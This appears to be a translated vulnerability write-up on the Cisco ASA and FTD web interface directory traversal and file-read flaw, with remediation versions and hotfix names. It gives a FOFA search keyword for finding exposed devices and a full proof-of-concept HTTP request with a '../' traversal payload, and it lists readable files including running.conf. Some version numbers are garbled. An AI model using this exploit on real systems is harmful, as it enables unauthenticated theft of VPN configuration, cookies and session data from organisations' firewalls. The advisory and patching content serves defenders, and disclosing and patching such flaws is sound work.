Vulnerability description
The Cisco Adaptive Security Appliance (ASA) firewall device and the Web management interface of the Cisco Firepower Threat Defense (FTD) device have unauthorized directory traversal vulnerabilities and remote arbitrary file reading vulnerabilities, allowing unauthenticated remote attackers to carry out directory traversal attacks And read sensitive files on the target system. This vulnerability cannot be used to gain access to ASA or FTD system files or underlying operating system (OS) files. Therefore, it can only read files in web system directories, such as webvpn configuration files, Information such as bookmarks, web cookies, part of web content, and hypertext transfer protocol URLs.
Vulnerability impact version
Vulnerability recurrence
FOFA search keywords:
/+CSCOE+/
POC is issued as follows
GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: x.x.x.x
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: webvpnlogin=1; webvpnLang=en
The following files can be read
"sess_update.html"
"blank.html"
"noportal.html"
"portal_ce.html"
"portal.html"
"logon_custom.css"
"svc.html"
"logo.gif"
"portal_inc.lua"
"nostcaccess.html"
"session.js"
"portal.js"
"portal_custom.css"
"running.conf"
"tlbrportal_forms.js"
"logon_forms.js"
"win.js"
"portal.css"
"lced.html"
"pluginlib.js"
"useralert.html"
"ping.html"
"app_index.html"
"shshimdo_url"
"session_password.html"
"relayjar.html"
"relayocx.html"
"color_picker.js"
"color_picker.html"
"cedhelp.html"
"cedmain.html"
"cedlogon.html"
"cedportal.html"
"portal_elements.html"
"commonspawn.js"
"common.js"
"appstart.js"
"relaymonjar.html"
"relaymonocx.html"
"cedsave.html"
"tunnel_linux.jnlp"
"ask.html"
"no_svc.html"
"preview.html"
"cedf.html"
"ced.html"
"logon_redirect.html"
"logout.html"
"tunnel_mac.jnlp"
"gp-gip.html"
"auth.html"
"wrong_url.html"
"logon.html"
Repair opinions
Cisco ASA
Upgrade to a repair version before version
9.6 9.6 upgrade to 9.6.4.42 version
9.7 upgrade to a repair version
9.8 upgrade to 9.8.420 version
9.9 version upgrade to 9.9.2.74 version
9.10 version upgrade to 9.10.1.42 version
9.12 Upgrade to 9.12.3.12 Version
9.13 Version Upgrade to 9.13.1.10 Version
9.14 Version Upgrade to 9.14.1.10 Version
Cisco FTD:
Upgrade from 6.2.2 version to a repair version
6.2.3 upgrade to 6.2.3.16 version
6.3.0 upgrade to 6.3.0.5 (Hot Fix)/6.3.0.6/6.4.0.9 (Hot Fix)/6.6.0.1 version
Upgrade from 6.4.0 version to 6.4.0.9 (Hot Fix)/6.4.0.10 version
6.5.0 upgrade to 6.5.0.4 (Hot Fix)/6.5.0.5/6.6.0.1 version
6.6.0 version upgrade to 6.6.0.1 version
Cisco FTD Hot Fix details:
6.3.0.5:
Cisco_FTD_Hotfix_AV-6.3.0.6-3.sh.REL.tar
Cisco_FTD_SSP_Hotfix_AV-6.3.0.6-3.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_AV-6.3.0.6-3.sh.REL.tar
6.4.0.9:
Cisco_FTD_Hotfix_BM-6.4 .0.10-2.sh.REL.tar
Cisco_FTD_SSP_FP1K_Hotfix_BM-6.4.0.10-2.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_BM-6.4.0.10-2.sh.REL.tar
Cisco_FTD_SSP_Hotfix_BM-6.4.0.10-2.sh.REL.tar
6.5 .0.4:
Cisco_FTD_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_FP1K_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_Hotfix_O-6.5.0.5-3.sh.REL.tar
To upgrade sh.REL.tar to the repaired version of Cisco FTD, customers can perform one of the following operations:
For devices using Cisco Firepower Management Center (FMC), please use the FMC interface to install and upgrade. After the installation is complete, reapply the access control policy.
For devices using Cisco Firepower Device Manager (FDM), please use the FDM interface to install and upgrade. After the installation is complete, reapply the access control policy.